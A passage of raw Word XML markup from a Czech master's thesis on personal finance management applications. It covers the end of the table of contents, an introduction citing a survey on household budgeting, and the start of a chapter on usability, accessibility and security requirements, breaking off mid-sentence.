            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327901 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>101</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2" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Conclusion</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327902 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>102</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3" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Seznam použité literatury</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327903 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>103</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4" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Seznam použitých symbolů a zkratek</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327904 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>105</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5" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Seznam obrázků</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327905 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>106</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00956893" w:rsidRDefault="004D2639">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
          <w:b w:val="0"/>
          <w:caps w:val="0"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink w:anchor="_Toc387327906" w:history="1">
        <w:r w:rsidR="00956893" w:rsidRPr="00F56E57">
          <w:rPr>
            <w:rStyle w:val="Hypertextovodkaz"/>
          </w:rPr>
          <w:t>Seznam Příloh</w:t>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc387327906 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:t>107</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="004D2639" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Obsah2"/>
        <w:suppressAutoHyphens/>
        <w:sectPr w:rsidR="00C94493" w:rsidSect="004F3D3C">
          <w:headerReference w:type="default" r:id="rId13"/>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4C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc387327786"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Úvod</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
    </w:p>
    <w:p w:rsidR="00613638" w:rsidRDefault="00613638" w:rsidP="00613638">
      <w:r>
        <w:t>Osobní finance jsou velmi citlivé a značně individuální téma každého z nás.</w:t>
      </w:r>
      <w:r w:rsidR="003E39DD">
        <w:t xml:space="preserve"> Podle výzkumu finanční gramotnosti v ČR provedeného společností STEM/MARK</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003E39DD">
        <w:t>pro Ministerstvo financí ČR a Českou národní banku v roce 2010</w:t>
      </w:r>
      <w:r w:rsidR="002424F9">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="003E39DD">
        <w:t>má o svých financích přehled celých 92% lidí</w:t>
      </w:r>
      <w:r w:rsidR="003171C2">
        <w:t xml:space="preserve"> (viz </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="003171C2">
        <w:instrText xml:space="preserve"> REF _Ref387008279 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidR="003171C2">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="003E39DD">
        <w:t>. Celkem 45% domácností si tvoří dopředu rozpočty a</w:t>
      </w:r>
      <w:r w:rsidR="00F16CA9">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003E39DD">
        <w:t xml:space="preserve">95% z nich alespoň někdy kontroluje jejich dodržování. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="12066756"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION NVcSdeuknf4iDPnX \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003171C2" w:rsidRDefault="003171C2" w:rsidP="003171C2">
      <w:pPr>
        <w:keepNext/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4682548" cy="3706283"/>
            <wp:effectExtent l="19050" t="19050" r="22802" b="27517"/>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 cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4680295" cy="3704500"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="003171C2" w:rsidRDefault="003171C2" w:rsidP="003171C2">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="28" w:name="_Ref387008279"/>
      <w:bookmarkStart w:id="29" w:name="_Toc387327907"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="28"/>
      <w:r>
        <w:t xml:space="preserve">. Graf zobrazující kolik </w:t>
      </w:r>
      <w:r w:rsidR="002424F9">
        <w:t>osob</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> v ČR má přehled o svých financích.</w:t>
      </w:r>
      <w:r w:rsidRPr="003171C2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="12066849"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION NVcSdeuknf4iDPnX \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w:rsidR="00315840" w:rsidRDefault="00315840" w:rsidP="00315840">
      <w:r>
        <w:t xml:space="preserve">Podle stejného výzkumu </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="12066898"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION NVcSdeuknf4iDPnX \l 1029 \* MERGEFORMAT  ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t xml:space="preserve"> lidé, kteří si sestavují rozpočty, sledují své příjmy a výdaje v 61% na papíře nebo elektronicky</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(viz </w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> REF _Ref387009054 \h </w:instrText>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:r w:rsidR="00956893">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="004D2639">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00315840" w:rsidRDefault="00315840" w:rsidP="00315840">
      <w:r>
        <w:t>Já sám s</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve">e řadím právě mezi tuto skupinu, své příjmy a výdaje si důsledně eviduji již několik let a používám k tomu </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>tabulky</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> v </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>programu</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> Microsoft Excel. Není to proto, že by </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>byl tento</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> způsob evidence osobních financí </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>dokonalý</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve">, ale spíše z toho důvodu, že jsem zatím nenašel žádný </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>jiný, který by mi vyhovoval</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve">. Otázkou je, zda </w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>ti lidé</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t>, kteří si evidují</w:t>
      </w:r>
      <w:r w:rsidR="00D725EA">
        <w:t xml:space="preserve"> své </w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> finance elektronicky či na papíře, k tomu použív</w:t>
      </w:r>
      <w:r w:rsidR="001A6898">
        <w:t>ají opravdu</w:t>
      </w:r>
      <w:r w:rsidR="002E4D75">
        <w:t xml:space="preserve"> nástroj co jim vyhovuje</w:t>
      </w:r>
      <w:r w:rsidR="00D725EA">
        <w:t xml:space="preserve">, nebo jsou na tom podobně jako já. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00323953" w:rsidRDefault="00323953" w:rsidP="00323953">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5580380" cy="4147217"/>
            <wp:effectExtent l="19050" t="19050" r="20320" b="24733"/>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cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5580380" cy="4147217"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00323953" w:rsidRDefault="00323953" w:rsidP="00323953">
      <w:pPr>
        <w:pStyle w:val="Titulek"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Ref387009054"/>
      <w:bookmarkStart w:id="31" w:name="_Toc387327908"/>
      <w:r>
        <w:t xml:space="preserve">Obr. </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Obr. \* ARABIC ">
        <w:r w:rsidR="00956893">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>2</w:t>
        </w:r>
      </w:fldSimple>
      <w:bookmarkEnd w:id="30"/>
      <w:r>
        <w:t xml:space="preserve">. Graf zobrazující zastoupení jednotlivých způsobů sledování </w:t>
      </w:r>
      <w:r w:rsidR="00746A4B">
        <w:t>financí</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="002424F9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="12066897"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION NVcSdeuknf4iDPnX \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[1]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w:rsidR="00D725EA" w:rsidRDefault="00D725EA" w:rsidP="00D725EA">
      <w:r>
        <w:t>Cílem této diplomové práce je zanalyzovat dostupné aplikace pro správu osobních financí (především na českém trhu) a navrhnout takové vlastní řešení této problematiky, které by mohlo být pozitivně přijato uživateli evidujícími si své finance jinými prostředky a případně i těmi, kteří si neevidují finance vůbec, protože pro to zatím nenašli žádný atraktivní nástroj.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D725EA" w:rsidRPr="00D725EA" w:rsidRDefault="00D725EA" w:rsidP="00D725EA"/>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:left w:w="70" w:type="dxa"/>
          <w:right w:w="70" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2905"/>
        <w:gridCol w:w="6023"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C94493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2905" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="st-slice"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="right"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6023" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
            <w:pPr>
              <w:pStyle w:val="st"/>
              <w:suppressAutoHyphens/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:bookmarkStart w:id="32" w:name="_Toc387327787"/>
            <w:r>
              <w:t>TEORETICKÁ ČÁST</w:t>
            </w:r>
            <w:bookmarkEnd w:id="32"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00C94493" w:rsidP="004C1DC7">
      <w:pPr>
        <w:suppressAutoHyphens/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C94493" w:rsidRDefault="00F3033A" w:rsidP="004C1DC7">
      <w:pPr>
        <w:pStyle w:val="Nadpis1"/>
        <w:suppressAutoHyphens/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc387327788"/>
      <w:bookmarkStart w:id="34" w:name="_Toc107634143"/>
      <w:bookmarkStart w:id="35" w:name="_Toc107635178"/>
      <w:bookmarkStart w:id="36" w:name="_Toc107635218"/>
      <w:bookmarkStart w:id="37" w:name="_Toc107635235"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Požadavky na aplikac</w:t>
      </w:r>
      <w:r w:rsidR="00751C7C">
        <w:t>i</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro správu</w:t>
      </w:r>
      <w:r w:rsidR="00C34FD8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>financí</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w:rsidR="00C87C8B" w:rsidRDefault="00613638" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Každý člověk přistupuje ke svým osobním financím jiným způsobem a podle toho má také různé očekávání od aplikace pro jejich správu. Dalo by se skoro říci, že ideální aplikace by byla vytvořena právě na míru konkrétnímu člověku a uměla by přesně to, co od ní požaduje, ale nic navíc. </w:t>
      </w:r>
      <w:r w:rsidR="0095448A">
        <w:t>S a</w:t>
      </w:r>
      <w:r w:rsidR="00442969">
        <w:t>plikac</w:t>
      </w:r>
      <w:r w:rsidR="0095448A">
        <w:t>í</w:t>
      </w:r>
      <w:r w:rsidR="00442969">
        <w:t xml:space="preserve"> určenou pro správu financí bude člověk p</w:t>
      </w:r>
      <w:r w:rsidR="0095448A">
        <w:t>racovat</w:t>
      </w:r>
      <w:r w:rsidR="00442969">
        <w:t xml:space="preserve"> denně a</w:t>
      </w:r>
      <w:r w:rsidR="001B4B08">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="00442969">
        <w:t>právě proto je velmi důležité, aby</w:t>
      </w:r>
      <w:r w:rsidR="001B4B08">
        <w:t xml:space="preserve"> pro něj </w:t>
      </w:r>
      <w:r w:rsidR="00442969">
        <w:t xml:space="preserve">byla co nejlépe použitelná. </w:t>
      </w:r>
      <w:r w:rsidR="001B4B08">
        <w:t xml:space="preserve">Rčení, že software není dokonalý tehdy, když do něj nelze nic přidat, ale až tehdy, když z něj nelze nic odebrat v tomto případě platí dvojnásob. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B4B08" w:rsidRDefault="001B4B08" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Existují dvě skupiny potencionálních uživatelů aplikace. Jedni by chtěli, aby byl výsledný software velmi komplexní a nabízel jim mnoho funkcí pro pokročilou analýzu jejich financí. Druzí by nejraději </w:t>
      </w:r>
      <w:r w:rsidR="0095448A">
        <w:t>měli k dispozici</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> software, který bude co nejjednodušší a tím pádem také velmi snadno použitelný. Požadavky těchto dvou skupin </w:t>
      </w:r>
      <w:r w:rsidR="00FF3AFE">
        <w:t>jdou</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> proti sobě, protože čím bude aplikace komplexnější a čím více funkcionality bude nabízet, tím méně přehlednou se </w:t>
      </w:r>
      <w:r w:rsidR="00FF3AFE">
        <w:t>může stát</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pro uživatele h</w:t>
      </w:r>
      <w:r w:rsidR="00FD43E8">
        <w:t>ledající</w:t>
      </w:r>
      <w:r w:rsidR="00057EB9">
        <w:t>ho</w:t>
      </w:r>
      <w:r w:rsidR="00FD43E8">
        <w:t xml:space="preserve"> jednoduchost a naopak.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AE2D26" w:rsidRDefault="0095448A" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Je třeba najít průnik požadavků těchto dvou skupin. </w:t>
      </w:r>
      <w:r w:rsidR="00510C32">
        <w:t>Jako důležit</w:t>
      </w:r>
      <w:r w:rsidR="006B40F7">
        <w:t>é</w:t>
      </w:r>
      <w:r w:rsidR="00510C32">
        <w:t xml:space="preserve"> bych označil</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00230602">
        <w:t>i nefunkční požadavky, například</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t>výborn</w:t>
      </w:r>
      <w:r w:rsidR="00230602">
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve"> uživatelsk</w:t>
      </w:r>
      <w:r w:rsidR="00230602">
        <w:t>ou</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve"> použitelnost výsledné aplikace (UX – </w:t>
      </w:r>
      <w:r w:rsidR="00B053CC">
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve">ser </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B053CC">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t>xperience</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005044E4">
        <w:t>). Výborná uživatelská použitelnost znamená</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t>, že aplikace má</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve"> dobře navrženou informační architekturu – tedy že uživatel </w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t>je</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve"> vždy schopen najít právě tu funkci, kterou chce použít, </w:t>
      </w:r>
      <w:r w:rsidR="005044E4" w:rsidRPr="005044E4">
        <w:t>práce</w:t>
      </w:r>
      <w:r w:rsidR="005044E4">
        <w:t xml:space="preserve"> s aplikací je p</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t>ro něj přirozená a zbytečně jej nezatěžuje</w:t>
      </w:r>
      <w:r w:rsidR="005A40B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="13469201"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION deVAJcbTgKKOs1K9 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[2]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="008353D7">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="007E2568">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t>Dále musí být aplikace pro uživatele atraktivní, aby ji měl chuť každodenně používat. Aplikace nesmí uživateli klást žádné překážky – a to ani</w:t>
      </w:r>
      <w:r w:rsidR="00F16CA9">
        <w:t xml:space="preserve"> v případě</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00F16CA9">
        <w:t>pokud</w:t>
      </w:r>
      <w:r w:rsidR="008353D7">
        <w:t xml:space="preserve"> by byl handicapovaný – měla by tedy splňovat alespoň </w:t>
      </w:r>
      <w:r w:rsidR="00371AD8">
        <w:t xml:space="preserve">základní požadavky přístupnosti </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="23344932"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION qpAkHKvlrZ75u3l5 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[3]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00371AD8">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FD43E8" w:rsidRDefault="008353D7" w:rsidP="00C87C8B">
      <w:r>
        <w:t xml:space="preserve">Dalším důležitým nefunkčním požadavkem, na kterém se </w:t>
      </w:r>
      <w:r w:rsidR="00AF3463">
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidR="00F16CA9">
        <w:t xml:space="preserve"> v</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tomto případě jistě shodne většina </w:t>
      </w:r>
      <w:r w:rsidR="00AF3463">
        <w:t xml:space="preserve">uživatelů, jsou vysoké nároky na zabezpečení aplikace. Osobní finance jsou jedním z nejcitlivějších témat každého </w:t>
      </w:r>
      <w:r w:rsidR="00057EB9">
        <w:t>člověka</w:t>
      </w:r>
      <w:r w:rsidR="00AF3463">
        <w:t xml:space="preserve">. Případný únik </w:t>
      </w:r>
      <w:r w:rsidR="00431407">
